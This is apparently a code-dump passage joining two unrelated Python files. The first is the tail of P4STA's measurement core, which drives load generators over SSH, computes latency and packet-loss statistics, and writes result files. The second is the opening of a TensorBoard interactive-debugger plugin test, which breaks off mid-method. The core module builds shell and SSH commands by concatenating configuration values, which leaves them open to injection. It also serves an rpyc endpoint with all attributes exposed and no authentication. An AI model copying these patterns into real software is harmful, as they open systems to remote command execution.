return cfg
def delete_by_id(self, file_id):
try:
shutil.rmtree(P4STA_utils.get_results_path(file_id))
except Exception as e:
print(e)
def get_ports(self):
cfg = P4STA_utils.read_current_cfg()
target = self.get_stamper_target_obj(cfg["selected_target"])
return target.port_lists()
def getAllMeasurements(self):
found = []
try:
folder = os.path.join(project_path, "results")
for f in os.listdir(folder):
path_to_res_folder = os.path.join(folder, f)
if os.path.isdir(path_to_res_folder):
for file in os.listdir(path_to_res_folder):
if "timestamp1" in file:
found.append(f)
except FileNotFoundError:
print(
"Directory 'results' not found. No older datasets available.")
found.sort(reverse=True)
return found
def getLatestMeasurementId(self):
all = self.getAllMeasurements()
if len(all) > 0:
last = all[0]
return last
return None
def start_loadgens(self, duration, l4_selected="tcp",
packet_size_mtu="1500", loadgen_rate_limit=0,
loadgen_flows=3, loadgen_server_groups=[1]):
cfg = P4STA_utils.read_current_cfg()
loadgen = self.get_loadgen_obj(cfg["selected_loadgen"])
loadgen.run_loadgens(str(P4staCore.measurement_id), duration,
l4_selected, packet_size_mtu,
self.get_current_results_path(),
loadgen_rate_limit, loadgen_flows,
loadgen_server_groups)
return P4staCore.measurement_id
# after loadgen test
def process_loadgens(self, file_id):
cfg = self.read_result_cfg(file_id)
loadgen = self.get_loadgen_obj(cfg["selected_loadgen"])
results = loadgen.process_loadgen_data(
str(file_id), P4STA_utils.get_results_path(file_id))
output, total_bits, error, total_retransmits, \
total_byte, custom_attr, to_plot = results
if not error:
print(to_plot)
for key, value in to_plot.items():
print("key: " + key + " value: " + str(value))
analytics.plot_graph(value["value_list_input"],
value["index_list"], value["titel"],
value["x_label"],
value["y_label"], value["filename"],
value["adjust_unit"],
value["adjust_y_ax"], file_id)
with open(os.path.join(P4STA_utils.get_results_path(file_id),
"output_loadgen_" + str(file_id) + ".txt"),
"w+") as f:
f.write("Used Loadgenerator: " + loadgen.get_name())
f.write("Total meaured speed: " + str(
analytics.find_unit_bit_byte(total_bits, "bit")[0]) + " " +
analytics.find_unit_bit_byte(total_bits, "bit")[
1] + "/s" + "\n")
f.write("Total measured throughput: " + str(
analytics.find_unit_bit_byte(total_byte, "byte")[
0]) + " " +
analytics.find_unit_bit_byte(total_byte, "byte")[
1] + "\n")
f.write("Total retransmitted packets: " + str(
total_retransmits) + " Packets" + "\n")
for key, value in custom_attr["elems"].items():
try:
f.write(value + "\n")
except Exception:
pass
return output, total_bits, error, total_retransmits, \
total_byte, custom_attr, to_plot
def deploy(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
print(target)
error = target.deploy(P4STA_utils.read_current_cfg())
print(error)
if error is not None and error != "":
P4STA_utils.log_error(error)
return error
def ping(self):
cfg = P4STA_utils.read_current_cfg()
output = []
use_port_counter = 0
for dut in cfg["dut_ports"]:
if dut["use_port"] == "checked":
use_port_counter = use_port_counter + 1
if use_port_counter > 1:
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
for loadgen_grp2 in cfg["loadgen_groups"]:
if loadgen_grp is not loadgen_grp2:
output += ['-----------------------',
'Host: ' + host['loadgen_ip'],
'-----------------------']
for dst_host in loadgen_grp2["loadgens"]:
output += P4STA_utils.execute_ssh(
host["ssh_user"], host["ssh_ip"],
self.check_ns(
host) + " timeout 1 ping " + str(
dst_host[
"loadgen_ip"]) + " -i 0.2 -c 3")
elif use_port_counter == 1:
for loadgen_grp in cfg["loadgen_groups"]:
if loadgen_grp["use_group"] == "checked":
for host in loadgen_grp["loadgens"]:
for dst_host in loadgen_grp["loadgens"]:
if host["id"] != dst_host["id"]:
output += P4STA_utils.execute_ssh(
host["ssh_user"], host["ssh_ip"],
self.check_ns(
host) + " timeout 1 ping " + str(
dst_host[
"loadgen_ip"]) + " -i 0.2 -c 3")
return output
def read_stamperice(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
cfg = target.read_stamperice(P4STA_utils.read_current_cfg())
with open(os.path.join(self.get_current_results_path(),
"stamper_" + str(
P4staCore.measurement_id) + ".json"),
"w") as write_json:
json.dump(cfg, write_json, indent=2, sort_keys=True)
if cfg["delta_counter"] == 0:
average = 0
else:
average = cfg["total_deltas"] / cfg["delta_counter"]
with open(os.path.join(self.get_current_results_path(),
"output_stamperice_" + str(
P4staCore.measurement_id) + ".txt"),
"w+") as f:
try:
f.write(
"###################################"
"#############################################\n")
f.write("######## Results from Stamper for ID " + str(
P4staCore.measurement_id) + " from " + str(
time.strftime('%H:%M:%S %d.%m.%Y', time.localtime(
int(P4staCore.measurement_id)))) + " ########\n")
f.write(
"#### The chosen ID results from the time"
" where the external hosts started. #####\n")
f.write(
"#######################################"
"#########################################\n\n")
f.write("Measured for all timestamped packets:" + "\n")
f.write("Average Latency: " + str(
round(analytics.find_unit([average])[0][0],
2)) + " " + str(
analytics.find_unit([average])[1]) + "\n")
f.write("Min Latency: " + str(
analytics.find_unit([cfg["min_delta"]])[0][0]) + " " + str(
analytics.find_unit([cfg["min_delta"]])[1]) + "\n")
f.write("Max Latency: " + str(
analytics.find_unit([cfg["max_delta"]])[0][0]) + " " + str(
analytics.find_unit([cfg["max_delta"]])[1]) + "\n\n")
f.write("Measured for all timestamped packets:" + "\n")
# Store packetloss between dut port and destination ports
# (where flows arrives after egressing dut)
num_ingress_packets = 0
num_egress_packets = 0
num_ingress_stamped_packets = 0
num_egress_stamped_packets = 0
packetloss_percent = 0
packetloss_percent_stamped = 0
for dut in cfg["dut_ports"]:
if dut["use_port"] == "checked":
num_ingress_packets += dut["num_ingress_packets"]
num_egress_packets += dut["num_egress_packets"]
num_ingress_stamped_packets += dut[
"num_ingress_stamped_packets"]
num_egress_stamped_packets += dut[
"num_egress_stamped_packets"]
packetloss = num_egress_packets - num_ingress_packets
packetloss_stamped = \
num_egress_stamped_packets - num_ingress_stamped_packets
if num_egress_packets > 0:
packetloss_percent = round(
(packetloss / num_egress_packets) * 100, 2)
if num_egress_stamped_packets > 0:
packetloss_percent_stamped = round(
(packetloss_stamped / num_egress_stamped_packets
) * 100, 2)
f.write("Packetloss for DUT: " + str(
packetloss_stamped) + " of " + str(
num_egress_stamped_packets) + " Packets (" + str(
packetloss_percent_stamped) + "%)" + "\n")
f.write("Measured for all packets (on port base):" + "\n")
f.write(
"Packetloss for DUT: " + str(packetloss) + " of " + str(
num_egress_packets) + " Packets (" + str(
packetloss_percent) + "%)" + "\n")
except Exception:
print(traceback.format_exc())
f.write("\n Exception:")
f.write("\n" + str(traceback.format_exc()))
for word in ["", "_stamped"]:
if word == "_stamped":
f.write("\n\nMeasured for timestamped packets only:")
else:
f.write("\nMeasure for all packets:")
f.write(
"\n----------------- INGRESS -----------------||"
"|---------------- EGRESS ------------------\n")
table = [
["IN", "GBytes", "Packets", "Ave Size (Byte)", "GBytes",
"Packets", "Ave Size (Byte)", "OUT"]]
try:
for loadgen_grp in cfg["loadgen_groups"]:
if loadgen_grp["use_group"] == "checked":
for host in loadgen_grp["loadgens"]:
selected_dut = {}
for dut in cfg["dut_ports"]:
if loadgen_grp["group"] == dut["id"]:
selected_dut = dut
break
try:
table.append(
[host["real_port"],
round(host["num_ingress" + word +
"_bytes"] / 1000000000, 2),
host["num_ingress" +
word + "_packets"],
round(host["num_ingress" + word +
"_bytes"] / host[
"num_ingress" + word + "_packets"],
2),
round(selected_dut["num_egress" +
word + "_bytes"
] / 1000000000, 2),
selected_dut["num_egress" + word +
"_packets"],
round(selected_dut["num_egress" +
word + "_bytes"] /
selected_dut["num_egress" +
word + "_packets"],
2),
selected_dut["real_port"]])
except ZeroDivisionError:
table.append(
[host["real_port"], "err: could be 0",
host[
"num_ingress" + word + "_packets"],
"err: could be 0",
"err: could be 0", selected_dut[
"num_egress" + word + "_packets"],
"err: could be 0",
selected_dut["real_port"]])
for loadgen_grp in cfg["loadgen_groups"]:
if loadgen_grp["use_group"] == "checked":
for host in loadgen_grp["loadgens"]:
selected_dut = {}
for dut in cfg["dut_ports"]:
if loadgen_grp["group"] == dut["id"]:
selected_dut = dut
break
try:
table.append(
[selected_dut["real_port"],
round(selected_dut["num_ingress" +
word + "_bytes"] /
1000000000, 2),
selected_dut["num_ingress" + word +
"_packets"],
round(selected_dut["num_ingress" +
word + "_bytes"] /
selected_dut["num_ingress" +
word + "_packets"],
2),
round(host["num_egress" + word +
"_bytes"] / 1000000000,
2), host["num_egress" + word +
"_packets"],
round(host["num_egress" + word +
"_bytes"] / host[
"num_egress" + word + "_packets"],
2),
host["real_port"]])
except ZeroDivisionError:
table.append(
[host["real_port"], "err: could be 0",
host[
"num_ingress" + word + "_packets"],
"err: could be 0",
"err: could be 0", selected_dut[
"num_egress" + word + "_packets"],
"err: could be 0",
selected_dut["real_port"]])
except Exception as e:
print(traceback.format_exc())
table.append(["Error: " + str(e)])
# creates table with the help of tabulate module
f.write(tabulate(table, tablefmt="fancy_grid"))
def stamper_results(self, file_id):
def adjust_byte_unit(val):
if round(val / 1000000000, 2) > 1:
return str(round(val / 1000000000, 2)) + " GB"
elif round(val / 1000000, 2) > 1:
return str(round(val / 1000000, 2)) + " MB"
else:
return str(round(val / 1000, 2)) + " kB"
time_created = "not available"
try:
time_created = time.strftime('%H:%M:%S %d.%m.%Y',
time.localtime(int(file_id)))
except Exception:
pass
try:
results_path = P4STA_utils.get_results_path(file_id)
my_file = Path(results_path + "/stamper_" + str(file_id) + ".json")
if not my_file.is_file():
# to maintain backward compatibility try for p4_dev_ instead
my_file2 = Path(
results_path + "/p4_dev_" + str(file_id) + ".json")
if not my_file2.is_file():
raise Exception(
"stamper_" + str(file_id) + ".json or p4_dev_" + str(
file_id) + ".json not found in " + results_path)
else:
file_str = "/p4_dev_"
else:
file_str = "/stamper_"
with open(P4STA_utils.get_results_path(file_id) + file_str + str(
file_id) + ".json", "r") as file:
sw = json.load(file)
except Exception as e:
P4STA_utils.log_error("CORE Exception: " + traceback.format_exc())
return {"error": traceback.format_exc()}
if sw["delta_counter"] != 0:
average = sw["total_deltas"] / sw["delta_counter"]
else:
average = 0
range_delta = sw["max_delta"] - sw["min_delta"]
sw["average"] = analytics.find_unit([average])
sw["min_delta"] = analytics.find_unit(sw["min_delta"])
sw["max_delta"] = analytics.find_unit(sw["max_delta"])
sw["range"] = analytics.find_unit(range_delta)
sw["pkt"] = sw["delta_counter"]
sw["time"] = time_created
sw["filename"] = file_id
###################################################
# compute avg packet sizes ###############
# compute total throughput ###############
###################################################
for dut in sw["dut_ports"]:
if dut["use_port"] == "checked":
if dut["num_ingress_packets"] > 0:
dut["avg_packet_size_ingress"] = round(
dut["num_ingress_bytes"] / dut["num_ingress_packets"],
1)
else:
dut["avg_packet_size_ingress"] = 0
if dut["num_ingress_stamped_packets"] > 0:
dut["avg_packet_size_ingress_stamped"] = round(
dut["num_ingress_stamped_bytes"] / dut[
"num_ingress_stamped_packets"], 1)
else:
dut["avg_packet_size_ingress_stamped"] = 0
if dut["num_egress_packets"] > 0:
dut["avg_packet_size_egress"] = round(
dut["num_egress_bytes"] / dut["num_egress_packets"], 1)
else:
dut["avg_packet_size_egress"] = 0
if dut["num_egress_stamped_packets"] > 0:
dut["avg_packet_size_egress_stamped"] = round(
dut["num_egress_stamped_bytes"] / dut[
"num_egress_stamped_packets"], 1)
else:
dut["avg_packet_size_egress_stamped"] = 0
dut["throughput_gbyte_ingress"] = adjust_byte_unit(
dut["num_ingress_bytes"])
dut["throughput_gbyte_ingress_stamped"] = adjust_byte_unit(
dut["num_ingress_stamped_bytes"])
dut["throughput_gbyte_egress"] = adjust_byte_unit(
dut["num_egress_bytes"])
dut["throughput_gbyte_egress_stamped"] = adjust_byte_unit(
dut["num_egress_stamped_bytes"])
for loadgen_grp in sw["loadgen_groups"]:
if loadgen_grp["use_group"] == "checked":
for port in loadgen_grp["loadgens"]:
port["avg_packet_size_ingress"] = port[
"avg_packet_size_egress"] = 0
port["avg_packet_size_ingress_stamped"] = port[
"avg_packet_size_egress_stamped"] = 0
if port["num_ingress_packets"] > 0:
port["avg_packet_size_ingress"] = round(
port["num_ingress_bytes"] / port[
"num_ingress_packets"], 1)
if port["num_egress_packets"] > 0:
port["avg_packet_size_egress"] = round(
port["num_egress_bytes"] / port[
"num_egress_packets"], 1)
try:
if port["num_ingress_stamped_packets"] > 0:
port["avg_packet_size_ingress_stamped"] = round(
port["num_ingress_stamped_bytes"] / port[
"num_ingress_stamped_packets"], 1)
if port["num_egress_stamped_packets"] > 0:
port["avg_packet_size_egress_stamped"] = round(
port["num_egress_stamped_bytes"] / port[
"num_egress_stamped_packets"], 1)
port["throughput_gbyte_ingress_stamped"] = \
adjust_byte_unit(
port["num_ingress_stamped_bytes"])
port[
"throughput_gbyte_egress_stamped"] = \
adjust_byte_unit(
port["num_egress_stamped_bytes"])
# if target has stamped counter not implemented yet
except KeyError:
print(traceback.format_exc())
port["throughput_gbyte_ingress"] = adjust_byte_unit(
port["num_ingress_bytes"])
port["throughput_gbyte_egress"] = adjust_byte_unit(
port["num_egress_bytes"])
# ext_host ingress throughput is ignored
sw["ext_host_throughput_egress"] = adjust_byte_unit(
sw["ext_host_num_egress_bytes"])
sw["ext_host_throughput_egress_stamped"] = adjust_byte_unit(
sw["ext_host_num_egress_stamped_bytes"])
if sw["ext_host_num_egress_packets"] > 0:
sw["ext_host_avg_packet_size_egress"] = round(
sw["ext_host_num_egress_bytes"] / sw[
"ext_host_num_egress_packets"], 1)
else:
sw["ext_host_avg_packet_size_egress"] = 0
if sw["ext_host_num_egress_stamped_packets"] > 0:
sw["ext_host_avg_packet_size_egress_stamped"] = round(
sw["ext_host_num_egress_stamped_bytes"] / sw[
"ext_host_num_egress_stamped_packets"], 1)
else:
sw["ext_host_avg_packet_size_egress_stamped"] = 0
###################################################
# compute packet losses ##################
###################################################
# if only one dut port is used dst_dut should be same, Store packetloss
# between dut port and dst ports (where flows arrives after dut)
num_ingress_packets = 0
num_egress_packets = 0
num_ingress_stamped_packets = 0
num_egress_stamped_packets = 0
for dut in sw["dut_ports"]:
if dut["use_port"] == "checked":
num_ingress_packets += dut["num_ingress_packets"]
num_egress_packets += dut["num_egress_packets"]
num_ingress_stamped_packets += dut[
"num_ingress_stamped_packets"]
num_egress_stamped_packets += dut["num_egress_stamped_packets"]
sw["dut_stats"] = {}
sw["dut_stats"]["total_num_egress_packets"] = num_egress_packets
sw["dut_stats"][
"total_num_egress_stamped_packets"] = num_egress_stamped_packets
count = 0
checked_dut_indexes = []
for dut in sw["dut_ports"]:
if dut["use_port"] == "checked":
checked_dut_indexes.append(count)
count = count + 1
# dual_port_mode activated if 2 dut ports are used
# => calc packetloss for 2 separate flows
sw["dut_stats"]["dut_dual_port_mode"] = (count == 2)
if sw["dut_stats"]["dut_dual_port_mode"]:
for i, z in [(0, 1), (1, 0)]:
c_i = checked_dut_indexes[i]
c_z = checked_dut_indexes[z]
sw["dut_ports"][c_i]["packetloss"] = \
sw["dut_ports"][c_i]["num_egress_packets"] - \
sw["dut_ports"][c_z]["num_ingress_packets"]
if sw["dut_ports"][c_i]["num_egress_packets"] > 0:
sw["dut_ports"][c_i]["packetloss_percent"] = round(
(sw["dut_ports"][c_i]["packetloss"] / sw[
"dut_ports"][c_i]["num_egress_packets"]) * 100, 2)
else:
sw["dut_ports"][c_i]["packetloss_percent"] = 0
sw["dut_ports"][c_i]["packetloss_stamped"] = \
sw["dut_ports"][c_i]["num_egress_stamped_packets"] - \
sw["dut_ports"][c_z]["num_ingress_stamped_packets"]
if sw["dut_ports"][c_i]["num_egress_stamped_packets"] > 0:
sw["dut_ports"][c_i]["packetloss_stamped_percent"] = round(
(sw["dut_ports"][c_i]["packetloss_stamped"] / sw[
"dut_ports"][c_i][
"num_egress_stamped_packets"]) * 100, 2)
else:
sw["dut_ports"][c_i]["packetloss_stamped_percent"] = 0
sw["dut_stats"][
"total_packetloss"] = num_egress_packets - num_ingress_packets
if sw["dut_stats"]["total_packetloss"] > 0:
sw["dut_stats"]["total_packetloss_percent"] = round(
(sw["dut_stats"][
"total_packetloss"] / num_egress_packets) * 100, 2)
else:
sw["dut_stats"]["total_packetloss_percent"] = 0
sw["dut_stats"]["total_packetloss_stamped"] = \
num_egress_stamped_packets - num_ingress_stamped_packets
if sw["dut_stats"]["total_packetloss_stamped"] > 0:
sw["dut_stats"]["total_packetloss_stamped_percent"] = round(
(sw["dut_stats"]["total_packetloss_stamped"] /
num_egress_stamped_packets) * 100, 2)
else:
sw["dut_stats"]["total_packetloss_stamped_percent"] = 0
return sw
# resets registers in p4 device
def reset(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
ret_val = target.reset_p4_registers(P4STA_utils.read_current_cfg())
if ret_val is None:
ret_val = ""
return ret_val
def check_ns(self, host):
if "namespace_id" in host:
return "sudo ip netns exec " + str(host["namespace_id"])
else:
return ""
def stamper_status(self):
def check_host(host):
pingresp = (os.system("timeout 1 ping " + host[
"ssh_ip"] + " -c 1") == 0) # if ping works it should be true
host["reachable"] = pingresp
if pingresp:
output_host = "\n".join(
P4STA_utils.execute_ssh(host["ssh_user"], host["ssh_ip"],
self.check_ns(
host) + " sudo ethtool " +
host["loadgen_iface"]))
pos = output_host.find("Link detected")
try:
if str(output_host[pos + 15:pos + 18]) == "yes":
host["link"] = "up"
else:
host["link"] = "down"
except Exception:
host["link"] = "error"
else:
host["link"] = "down"
cfg = P4STA_utils.read_current_cfg()
target = self.get_stamper_target_obj(cfg["selected_target"])
lines_pm, running, dev_status = target.stamper_status(cfg)
threads = list()
for loadgen_group in cfg["loadgen_groups"]:
for host in loadgen_group["loadgens"]:
x = threading.Thread(target=check_host, args=(host,))
threads.append(x)
x.start()
for thread in threads:
thread.join()
return cfg, lines_pm, running, dev_status
def start_stamper_software(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
return target.start_stamper_software(P4STA_utils.read_current_cfg())
def get_stamper_startup_log(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
return target.get_stamper_startup_log(P4STA_utils.read_current_cfg())
def stop_stamper_software(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
target.stop_stamper_software(P4STA_utils.read_current_cfg())
def reboot(self):
cfg = P4STA_utils.read_current_cfg()
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
P4STA_utils.execute_ssh(host["ssh_user"], host["ssh_ip"],
"sudo reboot")
def refresh_links(self):
cfg = P4STA_utils.read_current_cfg()
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
P4STA_utils.execute_ssh(
host["ssh_user"], host["ssh_ip"],
self.check_ns(host) + " sudo ethtool -r " +
host["loadgen_iface"])
def set_new_measurement_id(self):
file_id = str(int(round(
time.time()))) # generates name (time in sec since 1.1.1970)4
P4staCore.measurement_id = file_id
return file_id
def get_current_results_path(self):
return P4STA_utils.get_results_path(P4staCore.measurement_id)
def start_external(self):
file_id = str(P4staCore.measurement_id)
cfg = P4STA_utils.read_current_cfg()
target = self.get_stamper_target_obj(cfg["selected_target"])
lines_pm, running, dev_status = target.stamper_status(
P4STA_utils.read_current_cfg())
# backup current config (e.g. ports, speed) to results directory
if not os.path.exists(self.get_current_results_path()):
os.makedirs(self.get_current_results_path())
shutil.copy(project_path + "/data/config.json",
os.path.join(self.get_current_results_path(),
"config_" + str(
P4staCore.measurement_id) + ".json"))
multi = self.get_target_cfg()['stamping_capabilities'][
'timestamp-multi']
tsmax = self.get_target_cfg()['stamping_capabilities']['timestamp-max']
errors = ()
if running:
errors = self.get_current_extHost_obj().start_external(file_id,
multi=multi,
tsmax=tsmax)
if errors != ():
P4STA_utils.log_error(errors)
return running, errors
def stop_external(self):
try:
if int(P4staCore.measurement_id) == -1:
raise Exception
stoppable = self.get_current_extHost_obj().stop_external(
P4staCore.measurement_id)
except Exception:
stoppable = False
self.read_stamperice()
return stoppable
# displays results from external host from return of analytics module
def external_results(self, measurement_id):
cfg = self.read_result_cfg(str(measurement_id))
extH_results = analytics.main(str(measurement_id), cfg["multicast"],
P4STA_utils.get_results_path(
measurement_id))
f = open(P4STA_utils.get_results_path(
measurement_id) + "/output_external_host_" + str(
measurement_id) + ".txt", "w+")
f.write("Results from externel Host for every " + str(
cfg["multicast"] + ". packet") + "\n")
f.write("Raw packets: " + str(
extH_results["num_raw_packets"]) + " Processed packets: " + str(
extH_results[
"num_processed_packets"]) + " Total throughput: " + str(
extH_results["total_throughput"]) + " Megabytes \n")
f.write("Min latency: " + str(
analytics.find_unit(extH_results["min_latency"])[0][
0]) + " " + str(
analytics.find_unit(extH_results["min_latency"])[1]))
f.write(" Max latency: " + str(
analytics.find_unit(extH_results["max_latency"])[0][
0]) + " " + str(
analytics.find_unit(extH_results["max_latency"])[1]))
f.write(" Average latency: " + str(
analytics.find_unit(extH_results["avg_latency"])[0][
0]) + " " + str(
analytics.find_unit(extH_results["avg_latency"])[1]) + "\n")
f.write("Min IPDV: " + str(
analytics.find_unit(extH_results["min_ipdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["min_ipdv"])[1]) + "\n")
f.write("Max IPDV: " + str(
analytics.find_unit(extH_results["max_ipdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["max_ipdv"])[1]) + "\n")
f.write("Average IPDV: " + str(
analytics.find_unit(extH_results["avg_ipdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["avg_ipdv"])[1])
+ " and abs(): " + str(
analytics.find_unit(extH_results["avg_abs_ipdv"])[0][
0]) + " " + str(
analytics.find_unit(extH_results["avg_abs_ipdv"])[1]) + "\n")
f.write("Min PDV: " + str(
analytics.find_unit(extH_results["min_pdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["min_pdv"])[1]) + "\n")
f.write("Max PDV: " + str(
analytics.find_unit(extH_results["max_pdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["max_pdv"])[1]) + "\n")
f.write("Average PDV: " + str(
analytics.find_unit(extH_results["avg_pdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["avg_pdv"])[1]) + "\n")
f.write("Min packet/s: " + str(
extH_results["min_packets_per_second"]) + " Max packet/s: " + str(
extH_results[
"max_packets_per_second"]) + " Average packet/s: " + str(
extH_results["avg_packets_per_second"]) + "\n")
f.close()
def fetch_interface(self, ssh_user, ssh_ip, iface, namespace=""):
return P4STA_utils.fetch_interface(ssh_user, ssh_ip, iface, namespace)
def set_interface(self, ssh_user, ssh_ip, iface, iface_ip, namespace=""):
if namespace == "":
line = subprocess.run(
[project_path + "/core/scripts/setIP.sh", ssh_user, ssh_ip,
iface, iface_ip], stdout=subprocess.PIPE).stdout.decode(
"utf-8")
else:
line = subprocess.run(
[project_path + "/core/scripts/setIP_namespace.sh", ssh_user,
ssh_ip, iface, iface_ip, namespace],
stdout=subprocess.PIPE).stdout.decode("utf-8")
# error = return True; worked = return False
return not (line.find("worked") > -1 and line.find(
"ifconfig_success") > -1)
def execute_ssh(self, user, ip_address, arg):
return P4STA_utils.execute_ssh(user, ip_address, arg)
def check_sudo(self, user, ip_address):
return P4STA_utils.check_sudo(user, ip_address)
def fetch_mtu(self, user, ip_address, iface, namespace=""):
mtu = "0"
if namespace != "":
namespace = "sudo ip netns exec " + namespace + " "
lines = self.execute_ssh(
user, ip_address, namespace + "ip addr show " +
iface + " | grep mtu")
if len(lines) > 0:
mtu_ind = lines[0].find("mtu")
mtu = lines[0][mtu_ind + 4:].split(" ")[0]
if not mtu.isdigit():
mtu = "0"
return mtu
def get_results_path(self, file_id):
return P4STA_utils.get_results_path(file_id)
def delete_namespace(self, ns, user, ssh_ip):
all = self.execute_ssh(user, ssh_ip, "sudo ip netns list")
if ns in all:
self.execute_ssh(user, ssh_ip, "sudo ip netns del " + ns)
return True
else:
return False
def status_overview(self):
cfg = P4STA_utils.read_current_cfg()
num_loadgens = 0
for loadgen_group in cfg["loadgen_groups"]:
num_loadgens = num_loadgens + len(loadgen_group["loadgens"])
results = [None] * (
num_loadgens + 3) # stores the return values from threads
# start threads
threads = list()
x = threading.Thread(target=self.get_stamper_target_obj(
cfg["selected_target"]).stamper_status_overview,
args=(results, 0, cfg))
threads.append(x)
x.start()
x = threading.Thread(
target=self.get_current_extHost_obj().ext_host_status_overview,
args=(results, 1, cfg))
threads.append(x)
x.start()
ind = 2
for loadgen_group in cfg["loadgen_groups"]:
if loadgen_group["use_group"] == "checked":
for host in loadgen_group["loadgens"]:
x = threading.Thread(target=self.get_loadgen_obj(
cfg["selected_loadgen"]).loadgen_status_overview,
args=(host, results, ind))
threads.append(x)
x.start()
ind = ind + 1
for thread in threads:
thread.join()
# collecting all results
for i in range(0, 2):
if results[i] is not None:
cfg = {**cfg, **results[i]}
else:
print("### results[" + str(i) + "] = NONE ###")
ind = 2
for loadgen_group in cfg["loadgen_groups"]:
if loadgen_group["use_group"] == "checked":
for host in loadgen_group["loadgens"]:
host["ssh_ping"] = results[ind]["ssh_ping"]
host["sudo_rights"] = results[ind]["sudo_rights"]
host["needed_sudos_to_add"] = results[ind][
"needed_sudos_to_add"]
host["fetched_ipv4"] = results[ind]["fetched_ipv4"]
host["fetched_mac"] = results[ind]["fetched_mac"]
host["fetched_prefix"] = results[ind]["fetched_prefix"]
host["up_state"] = results[ind]["up_state"]
host["ip_routes"] = results[ind]["ip_routes"]
host["namespaces"] = results[ind]["namespaces"]
if "custom_checks" in results[ind]:
host["custom_checks"] = results[ind]["custom_checks"]
ind = ind + 1
return cfg
if __name__ == '__main__':
s = rpyc.utils.server.ThreadedServer(
P4staCore(), port=6789, protocol_config={'allow_all_attrs': True,
'allow_public_attrs': True,
'sync_request_timeout': 10})
s.start()
|
interactive_debugger_plugin_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests end-to-end debugger interactive data server behavior.
This test launches an instance InteractiveDebuggerPlugin as a separate thread.
The test then calls Session.run() using RunOptions pointing to the grpc:// debug
URL of the debugger data server. It then sends HTTP requests to the TensorBoard
backend endpoints to query and control the state of the Sessoin.run().
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import shutil
import tempfile
import threading
import numpy as np
import portpicker # pylint: disable=import-error
from six.moves import urllib # pylint: disable=wrong-import-order
import tensorflow as tf # pylint: disable=wrong-import-order
from tensorflow.python import debug as tf_debug # pylint: disable=wrong-import-order
from werkzeug import test as werkzeug_test # pylint: disable=wrong-import-order
from werkzeug import wrappers # pylint: disable=wrong-import-order
from tensorboard.backend import application
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.debugger import interactive_debugger_plugin
_SERVER_URL_PREFIX = '/data/plugin/debugger/'
class InteractiveDebuggerPluginTest(tf.test.TestCase):
def setUp(self):
super(InteractiveDebuggerPluginTest, self).setUp()
self._dummy_logdir = tempfile.mkdtemp()
self._dummy_multiplexer = event_multiplexer.EventMultiplexer({})
self._debugger_port = portpicker.pick_unused_port()
self._debugger_url = 'grpc://localhost:%d' % self._debugger_port
context = base_plugin.TBContext(logdir=self._dummy_logdir,
multiplexer=self._dummy_multiplexer)
self._debugger_plugin = (
interactive_debugger_plugin.InteractiveDebuggerPlugin(context))
self._debugger_plugin.listen(self._debugger_port)
wsgi_app = application.TensorBoardWSGIApp(
self._dummy_logdir,
[self._debugger_plugin],
self._dummy_multiplexer,
reload_interval=0,
path_prefix='')
self._server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)
def tearDown(self):
# In some cases (e.g., an empty test method body), the stop_server() method
# may get called before the server is started, leading to a ValueError.
while True:
try:
self._debugger_plugin._debugger_data_server.stop_server()
break
except ValueError:
pass
shutil.rmtree(self._dummy_logdir, ignore_errors=True)
super(InteractiveDebuggerPluginTest, self).tearDown()
def _serverGet(self, path, params=None, expected_status_code=200):
"""Send the serve a GET request and obtain the response.
Args:
path: URL path (excluding the prefix), without parameters encoded.
params: Query parameters to be encoded in the URL, as a dict.
expected_status_code: Expected status code.
Returns:
Response from server.
"""
url = _SERVER_URL_PREFIX + path
if params:
url += '?' + urllib.parse.urlencode(params)
response = self._server.get(url)
self.assertEqual(expected_status_code, response.status_code)
return response
def _deserializeResponse(self, response):
"""Deserializes byte content that is a JSON encoding.
Args:
response: A response object.
Returns:
The deserialized python object decoded from JSON.
"""
return json.loads(response.get_data().decode("utf-8"))
def _runSimpleAddMultiplyGraph(self, variable_size=1):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable([10.0] * variable_size, name='a')
b = tf.Variable([20.0] * variable_size, name='b')
c = tf.Variable([30.0] * variable_size, name='c')
x = tf.multiply(a, b, name="x")
y = tf.add(x, c, name="y")
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(y))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def _runMultiStepAssignAddGraph(self, steps):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(10, dtype=tf.int32, name='a')
b = tf.Variable(1, dtype=tf.int32, name='b')
inc_a = tf.assign_add(a, b, name='inc_a')
sess.run(tf.global_variables_initializer())
